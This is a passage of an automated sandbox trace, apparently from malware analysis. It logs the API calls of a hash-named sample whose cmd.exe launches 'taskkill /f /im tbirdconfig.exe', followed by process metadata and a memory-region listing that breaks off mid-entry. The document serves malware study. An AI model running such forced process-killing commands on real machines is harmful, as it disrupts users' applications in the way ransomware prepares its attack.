GetProcessHeap () returned 0x5c0000 [0182.187] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4c) returned 0x5caf60 [0182.187] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0182.188] GetProcessHeap () returned 0x5c0000 [0182.188] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x418) returned 0x5c05c8 [0182.188] SetErrorMode (uMode=0x0) returned 0x8003 [0182.188] SetErrorMode (uMode=0x1) returned 0x0 [0182.188] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5c05d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0182.188] SetErrorMode (uMode=0x8003) returned 0x1 [0182.188] GetProcessHeap () returned 0x5c0000 [0182.188] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5c05c8, Size=0x56) returned 0x5c05c8 [0182.188] GetProcessHeap () returned 0x5c0000 [0182.188] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c05c8) returned 0x56 [0182.188] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0182.188] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.188] GetProcessHeap () returned 0x5c0000 [0182.188] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x110) returned 0x5cafb8 [0182.188] GetProcessHeap () returned 0x5c0000 [0182.188] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x218) returned 0x5c0628 [0182.193] GetProcessHeap () returned 0x5c0000 [0182.193] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5c0628, Size=0x112) returned 0x5c0628 [0182.193] GetProcessHeap () returned 0x5c0000 [0182.193] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5c0628) returned 0x112 [0182.193] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0182.193] GetProcessHeap () returned 0x5c0000 [0182.193] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xe0) returned 0x5cb0d0 [0182.196] GetProcessHeap () returned 0x5c0000 [0182.196] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5cb0d0, Size=0x76) returned 0x5cb0d0 [0182.196] GetProcessHeap () returned 0x5c0000 [0182.196] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5cb0d0) returned 0x76 [0182.196] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0182.196] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0182.197] GetLastError () returned 0x2 [0182.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0182.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5cb150 [0182.197] GetProcessHeap () returned 0x5c0000 [0182.197] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x14) returned 0x5c7888 [0182.197] FindClose (in: hFindFile=0x5cb150 | out: hFindFile=0x5cb150) returned 1 [0182.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0182.197] GetLastError () returned 0x2 [0182.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5cb150 [0182.197] GetProcessHeap () returned 0x5c0000 [0182.197] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5c7888, Size=0x4) returned 0x5c7eb8 [0182.197] FindClose (in: hFindFile=0x5cb150 | out: hFindFile=0x5cb150) returned 1 [0182.198] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.198] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.198] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0182.200] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0182.200] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0182.200] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c)) [0182.200] GetProcessHeap () returned 0x5c0000 [0182.200] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x18) returned 0x5c7748 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0182.200] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0182.201] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0182.201] GetProcessHeap () returned 0x5c0000 [0182.201] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c7748) returned 1 [0182.201] GetProcessHeap () returned 0x5c0000 [0182.201] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa) returned 0x5cb150 [0182.201] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.204] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im tbirdconfig.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im tbirdconfig.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im tbirdconfig.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xf9c, dwThreadId=0xffc)) returned 1 [0182.221] CloseHandle (hObject=0x98) returned 1 [0182.221] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.221] GetProcessHeap () returned 0x5c0000 [0182.222] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c9e60) returned 1 [0182.222] GetEnvironmentStringsW () returned 0x5c9e60* [0182.222] GetProcessHeap () returned 0x5c0000 [0182.222] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa76) returned 0x5c7fe8 [0182.222] FreeEnvironmentStringsA (penv="=") returned 1 [0182.222] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0183.775] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0183.775] CloseHandle (hObject=0x9c) returned 1 [0183.775] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0183.776] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0183.776] GetProcessHeap () returned 0x5c0000 [0183.777] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c7fe8) returned 1 [0183.777] GetEnvironmentStringsW () returned 0x5cb2b0* [0183.777] GetProcessHeap () returned 0x5c0000 [0183.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa9c) returned 0x5c7fe8 [0183.777] FreeEnvironmentStringsA (penv="=") returned 1 [0183.777] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.777] GetProcessHeap () returned 0x5c0000 [0183.777] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c7fe8) returned 1 [0183.777] GetEnvironmentStringsW () returned 0x5cb2b0* [0183.778] GetProcessHeap () returned 0x5c0000 [0183.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa9c) returned 0x5c7fe8 [0183.778] FreeEnvironmentStringsA (penv="=") returned 1 [0183.778] GetProcessHeap () returned 0x5c0000 [0183.778] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cb150) returned 1 [0183.778] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0183.778] _get_osfhandle (_FileHandle=1) returned 0x130 [0183.778] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0183.778] _get_osfhandle (_FileHandle=1) returned 0x130 [0183.778] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0183.778] _get_osfhandle (_FileHandle=0) returned 0x158 [0183.778] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0183.778] GetConsoleOutputCP () returned 0x1b5 [0183.779] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0183.779] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.780] exit (_Code=128) Thread: id = 243 os_tid = 0xba0 Process: id = "43" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x303eb000" os_pid = "0xf9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0xfa0" cmd_line = "taskkill /f /im tbirdconfig.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3278 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3279 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3280 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3281 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 3282 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3283 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 3284 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3285 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3286 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 3287 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3288 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3289 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3290 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3291 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3292 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3293 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3294 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3295 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3296 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 3297 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3298 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3299 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3300 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3301 start_va = 0x45a0000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 3302 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3303 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3304 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3305 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3306 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3307 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3308 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3309 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3310 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3311 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 3312 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3313 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3314 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3315 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3316 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3317 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3318 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3319 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3320 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3321 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3322 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3323 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3324 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3325 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3326 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3327 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3328 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3329 start_va = 0x4780000 end_va = 0x48effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 3330 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3331 start_va = 0x48f0000 end_va = 0x4a77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048f0000" filename = "" Region: id = 3332 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3333 start_va = 0x4a80000 end_va = 0x4c00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a80000" filename = "" Region: id = 3334 start_va = 0x4c10000 end_va = 0x600ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c10000" filename = "" Region: id = 3335 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3336 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 3337 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 3338 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 3339 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 3340 start_va = 0x6010000 end_va = 0x6346fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3341 start_va = 0x4780000 end_va = 0x4869fff monitored = 0 entry_point = 0x47bd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3342 start_va = 0x48e0000 end_va = 0x48effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 3343 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 3344 start_va = 0x45a0000 end_va = 0x467ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3345 start_va = 0x4680000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 3346 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 